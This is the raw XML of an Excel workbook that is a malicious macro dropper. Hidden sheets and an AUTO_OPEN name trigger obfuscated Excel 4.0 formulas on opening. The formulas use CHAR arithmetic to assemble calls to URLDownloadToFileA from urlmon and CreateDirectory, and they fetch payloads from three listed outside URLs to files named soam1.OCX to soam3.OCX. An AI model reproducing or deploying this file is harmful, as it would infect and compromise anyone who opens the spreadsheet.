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160" activeTab="0"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet" sheetId="1" r:id="rId1"/>
    <sheet name="Fhgyk" sheetId="2" state="hidden" r:id="rId2"/>
    <sheet name="Tjdtjf" sheetId="3" state="hidden" r:id="rId3"/>
    <sheet name="Vehsrg" sheetId="4" state="hidden" r:id="rId4"/>
  </sheets>
  <definedNames>
    <definedName name="_xlfn.ARABIC" hidden="1">#NAME?</definedName>
    <definedName name="MY57">'Sheet'!$I$5</definedName>
    <definedName name="PGEVB">'PVVEBZ'!$H$25</definedName>
    <definedName name="UV76">'Sheet'!$I$5</definedName>
    <definedName name="AUTO_OPEN">'PVVEBZ'!$H$1</definedName>
  </definedNames>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="27" uniqueCount="25">
  <si>
    <t>X</t>
  </si>
  <si>
    <t>h</t>
  </si>
  <si>
    <t>d</t>
  </si>
  <si>
    <t>"</t>
  </si>
  <si>
    <t>:</t>
  </si>
  <si>
    <t>=</t>
  </si>
  <si>
    <t>,</t>
  </si>
  <si>
    <t>\</t>
  </si>
  <si>
    <t>C</t>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t>.</t>
  </si>
  <si>
    <t>L</t>
  </si>
  <si>
    <t>&amp;</t>
  </si>
  <si>
    <t>(</t>
  </si>
  <si>
    <t>U</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>)</t>
  </si>
  <si>
    <t>T</t>
  </si>
  <si>
    <t>R</t>
  </si>
  <si>
    <t>E</t>
  </si>
  <si>
    <t>N</t>
  </si>
  <si>
    <t>O</t>
  </si>
  <si>
    <t>ttp://natdemo.natrixsoftware.com/wp-admin/QyqiN/","</t>
  </si>
  <si>
    <t>ttp://luisangeja.com/COPYRIGHT/BJljffG6/","</t>
  </si>
  <si>
    <t>ttp://nerz.net/stats/KVIyooM/","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</si>
</sst>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7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419100</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>276225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G76" sqref="FG76"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="2" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" s="3" customFormat="1" ht="22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7">
      <selection activeCell="P23" sqref="P23"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15"/>
  <sheetData>
    <row r="1" ht="15">
      <c r="Q1" t="str">
        <f>CHAR(102/2)</f>
        <v>3</v>
      </c>
    </row>
    <row r="2" spans="5:19" ht="15">
      <c r="E2" t="str">
        <f>CHAR(216/2)</f>
        <v>l</v>
      </c>
      <c r="K2" t="str">
        <f>CHAR(35*2)</f>
        <v>F</v>
      </c>
      <c r="S2" t="str">
        <f>CHAR(100-35)</f>
        <v>A</v>
      </c>
    </row>
    <row r="3" spans="2:21" ht="15">
      <c r="B3" t="str">
        <f>CHAR(236-118)</f>
        <v>v</v>
      </c>
      <c r="I3" t="str">
        <f>CHAR(238/2)</f>
        <v>w</v>
      </c>
      <c r="O3" t="str">
        <f>CHAR(134/2)</f>
        <v>C</v>
      </c>
      <c r="U3">
        <v>5</v>
      </c>
    </row>
    <row r="4" spans="1:20" ht="15">
      <c r="A4" t="str">
        <f>CHAR(228/2)</f>
        <v>r</v>
      </c>
      <c r="F4" t="s">
        <v>0</v>
      </c>
      <c r="M4" t="str">
        <f>CHAR(148/2)</f>
        <v>J</v>
      </c>
      <c r="Q4">
        <v>1</v>
      </c>
      <c r="T4" t="str">
        <f>CHAR(42*2)</f>
        <v>T</v>
      </c>
    </row>
    <row r="5" spans="10:19" ht="15">
      <c r="J5" t="str">
        <f>CHAR(52*2)</f>
        <v>h</v>
      </c>
      <c r="S5" t="str">
        <f>CHAR(100/2)</f>
        <v>2</v>
      </c>
    </row>
    <row r="6" spans="4:17" ht="15">
      <c r="D6" t="str">
        <f>CHAR(185-110)</f>
        <v>K</v>
      </c>
      <c r="Q6" t="str">
        <f>CHAR(220-111)</f>
        <v>m</v>
      </c>
    </row>
    <row r="7" spans="12:22" ht="15">
      <c r="L7" t="str">
        <f>CHAR(170/2)</f>
        <v>U</v>
      </c>
      <c r="V7" t="str">
        <f>CHAR(224/2)</f>
        <v>p</v>
      </c>
    </row>
    <row r="8" spans="7:16" ht="15">
      <c r="G8" t="str">
        <f>CHAR(109-40)</f>
        <v>E</v>
      </c>
      <c r="M8" t="str">
        <f>CHAR(200-100)</f>
        <v>d</v>
      </c>
      <c r="P8" t="str">
        <f>CHAR(232/2)</f>
        <v>t</v>
      </c>
    </row>
    <row r="9" ht="15">
      <c r="T9" t="str">
        <f>CHAR(194/2)</f>
        <v>a</v>
      </c>
    </row>
    <row r="10" spans="6:11" ht="15">
      <c r="F10" t="str">
        <f>CHAR(203-102)</f>
        <v>e</v>
      </c>
      <c r="K10" t="str">
        <f>CHAR(164-82)</f>
        <v>R</v>
      </c>
    </row>
    <row r="11" spans="2:17" ht="15">
      <c r="B11" t="str">
        <f>CHAR(220/2)</f>
        <v>n</v>
      </c>
      <c r="O11" t="str">
        <f>CHAR(96/2)</f>
        <v>0</v>
      </c>
      <c r="Q11" t="str">
        <f>CHAR(136/2)</f>
        <v>D</v>
      </c>
    </row>
    <row r="13" spans="8:19" ht="15">
      <c r="H13" t="str">
        <f>CHAR(166/2)</f>
        <v>S</v>
      </c>
      <c r="L13" t="str">
        <f>CHAR(33*2)</f>
        <v>B</v>
      </c>
      <c r="S13" t="str">
        <f>CHAR(210/2)</f>
        <v>i</v>
      </c>
    </row>
    <row r="14" spans="5:14" ht="15">
      <c r="E14" t="str">
        <f>CHAR(240-120)</f>
        <v>x</v>
      </c>
      <c r="N14" t="str">
        <f>CHAR(217-100)</f>
        <v>u</v>
      </c>
    </row>
    <row r="15" spans="9:16" ht="15">
      <c r="I15" t="s">
        <v>1</v>
      </c>
      <c r="P15" t="str">
        <f>CHAR(202-103)</f>
        <v>c</v>
      </c>
    </row>
    <row r="16" spans="3:20" ht="15">
      <c r="C16" t="str">
        <f>CHAR(206-103)</f>
        <v>g</v>
      </c>
      <c r="M16" t="str">
        <f>CHAR(152-76)</f>
        <v>L</v>
      </c>
      <c r="T16" t="str">
        <f>CHAR(242/2)</f>
        <v>y</v>
      </c>
    </row>
    <row r="17" spans="6:18" ht="15">
      <c r="F17" t="s">
        <v>2</v>
      </c>
      <c r="R17" t="str">
        <f>CHAR(212-101)</f>
        <v>o</v>
      </c>
    </row>
    <row r="18" ht="15">
      <c r="O18" t="str">
        <f>CHAR(230/2)</f>
        <v>s</v>
      </c>
    </row>
    <row r="19" ht="15">
      <c r="J19" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="21" spans="12:21" ht="15">
      <c r="L21" t="s">
        <v>8</v>
      </c>
      <c r="P21" t="s">
        <v>0</v>
      </c>
      <c r="U21">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="6:12" ht="15">
      <c r="F24" t="s">
        <v>3</v>
      </c>
      <c r="H24" t="s">
        <v>4</v>
      </c>
      <c r="L24" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="26" spans="6:12" ht="15">
      <c r="F26" t="s">
        <v>6</v>
      </c>
      <c r="H26" t="s">
        <v>7</v>
      </c>
      <c r="L26" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="27" ht="15">
      <c r="L27" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="28" spans="6:12" ht="15">
      <c r="F28" t="str">
        <f>CHAR(32)</f>
        <v> </v>
      </c>
      <c r="H28" t="s">
        <v>10</v>
      </c>
      <c r="L28" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="29" ht="15">
      <c r="F29" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="30" ht="15">
      <c r="L30" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="31" spans="6:12" ht="15">
      <c r="F31" t="s">
        <v>14</v>
      </c>
      <c r="H31" t="s">
        <v>15</v>
      </c>
      <c r="L31" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="32" ht="15">
      <c r="C32" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="36" ht="15">
      <c r="E36" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="38" ht="15">
      <c r="C38" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="42" ht="15">
      <c r="E42" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="50" ht="15">
      <c r="L50" t="str">
        <f>T(Fhgyk!F10)</f>
        <v>e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19"/>
  <sheetViews>
    <sheetView zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A5">
      <selection activeCell="H17" sqref="H17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15"/>
  <sheetData>
    <row r="3" ht="15">
      <c r="D3" t="str">
        <f>T(Fhgyk!F10&amp;Fhgyk!E2&amp;Fhgyk!Q1&amp;Fhgyk!S5&amp;Fhgyk!F24&amp;Fhgyk!F26&amp;Fhgyk!F24&amp;Fhgyk!O3&amp;Fhgyk!A4)</f>
        <v>el32","Cr</v>
      </c>
    </row>
    <row r="5" ht="15">
      <c r="Q5" t="str">
        <f>T(Fhgyk!H26&amp;Fhgyk!L7&amp;Fhgyk!M8&amp;Fhgyk!N14&amp;Fhgyk!I3)</f>
        <v>\Uduw</v>
      </c>
    </row>
    <row r="7" ht="15">
      <c r="B7" t="str">
        <f>T(Fhgyk!L30&amp;Fhgyk!F24&amp;Fhgyk!D6&amp;Fhgyk!F10&amp;Fhgyk!A4&amp;Fhgyk!B11)</f>
        <v>("Kern</v>
      </c>
    </row>
    <row r="8" ht="15">
      <c r="F8" t="str">
        <f>T(Fhgyk!L30&amp;Fhgyk!F24&amp;Fhgyk!N14&amp;Fhgyk!A4)</f>
        <v>("ur</v>
      </c>
    </row>
    <row r="9" ht="15">
      <c r="M9" t="str">
        <f>T(Fhgyk!T16&amp;Fhgyk!S2&amp;Fhgyk!F24&amp;Fhgyk!F26&amp;Fhgyk!F24&amp;Fhgyk!M4&amp;Fhgyk!O3&amp;Fhgyk!M4&amp;Fhgyk!F24&amp;Fhgyk!F26&amp;Fhgyk!F24)</f>
        <v>yA","JCJ","</v>
      </c>
    </row>
    <row r="12" ht="15">
      <c r="I12" t="str">
        <f>T(Fhgyk!A4&amp;Fhgyk!F10&amp;Fhgyk!P15&amp;Fhgyk!P8&amp;Fhgyk!R17&amp;Fhgyk!A4)</f>
        <v>rector</v>
      </c>
    </row>
    <row r="14" ht="15">
      <c r="R14" t="str">
        <f>T(Fhgyk!E2&amp;Fhgyk!Q6&amp;Fhgyk!R17&amp;Fhgyk!B11&amp;Fhgyk!F24&amp;Fhgyk!F26&amp;Fhgyk!F24&amp;Fhgyk!L7&amp;Fhgyk!K10)</f>
        <v>lmon","UR</v>
      </c>
    </row>
    <row r="15" ht="15">
      <c r="B15" t="str">
        <f>T(Fhgyk!F26&amp;Fhgyk!O11&amp;Fhgyk!L31)</f>
        <v>,0)</v>
      </c>
    </row>
    <row r="17" spans="6:8" ht="15">
      <c r="F17" t="s">
        <v>22</v>
      </c>
      <c r="H17" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="19" ht="15">
      <c r="G19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R18"/>
  <sheetViews>
    <sheetView zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="R9" sqref="R9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15"/>
  <sheetData>
    <row r="2" ht="15">
      <c r="H2" t="str">
        <f>T(Fhgyk!O18&amp;Fhgyk!R17&amp;Fhgyk!T9&amp;Fhgyk!Q6&amp;Fhgyk!S5&amp;Fhgyk!H28&amp;Fhgyk!J19&amp;Fhgyk!L21&amp;Fhgyk!P21&amp;Fhgyk!F24)</f>
        <v>soam2.OCX"</v>
      </c>
    </row>
    <row r="4" ht="15">
      <c r="D4" t="str">
        <f>CONCATENATE(Fhgyk!F10&amp;Fhgyk!T9&amp;Fhgyk!P8&amp;Fhgyk!F10&amp;Fhgyk!Q11&amp;Fhgyk!S13)</f>
        <v>eateDi</v>
      </c>
    </row>
    <row r="5" ht="15">
      <c r="N5" t="str">
        <f>T(Fhgyk!F26&amp;Fhgyk!O11&amp;Fhgyk!F26&amp;Fhgyk!F24&amp;Fhgyk!I15)</f>
        <v>,0,"h</v>
      </c>
    </row>
    <row r="8" ht="15">
      <c r="F8" t="str">
        <f>T(Fhgyk!F26&amp;Fhgyk!O11&amp;Fhgyk!F26&amp;Fhgyk!O11&amp;Fhgyk!L31)</f>
        <v>,0,0)</v>
      </c>
    </row>
    <row r="9" ht="15">
      <c r="R9" t="str">
        <f>T(Fhgyk!O18&amp;Fhgyk!R17&amp;Fhgyk!T9&amp;Fhgyk!Q6&amp;Fhgyk!Q1&amp;Fhgyk!H28&amp;Fhgyk!J19&amp;Fhgyk!L21&amp;Fhgyk!P21&amp;Fhgyk!F24)</f>
        <v>soam3.OCX"</v>
      </c>
    </row>
    <row r="14" ht="15">
      <c r="C14" t="str">
        <f>T(Fhgyk!O18&amp;Fhgyk!R17&amp;Fhgyk!T9&amp;Fhgyk!Q6&amp;Fhgyk!Q4&amp;Fhgyk!H28&amp;Fhgyk!J19&amp;Fhgyk!L21&amp;Fhgyk!P21&amp;Fhgyk!F24)</f>
        <v>soam1.OCX"</v>
      </c>
    </row>
    <row r="16" ht="15">
      <c r="I16" t="str">
        <f>T(Fhgyk!F24&amp;Fhgyk!F26&amp;Fhgyk!F24&amp;Fhgyk!M4&amp;Fhgyk!M4&amp;Fhgyk!O3&amp;Fhgyk!O3&amp;Fhgyk!L13&amp;Fhgyk!L13&amp;Fhgyk!F24)</f>
        <v>","JJCCBB"</v>
      </c>
    </row>
    <row r="18" ht="15">
      <c r="L18" t="str">
        <f>T(Fhgyk!M16&amp;Fhgyk!Q11&amp;Fhgyk!R17&amp;Fhgyk!I3&amp;Fhgyk!B11&amp;Fhgyk!E2&amp;Fhgyk!R17&amp;Fhgyk!T9&amp;Fhgyk!M8&amp;Fhgyk!T4&amp;Fhgyk!R17&amp;Fhgyk!K2&amp;Fhgyk!S13&amp;Fhgyk!E2)</f>
        <v>LDownloadToFil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Posik</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>TYHRETH</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:19:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-23T19:35:34Z</dcterms:modified>
  <cp:category/>
  <cp:version/>
  <cp:contentType/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>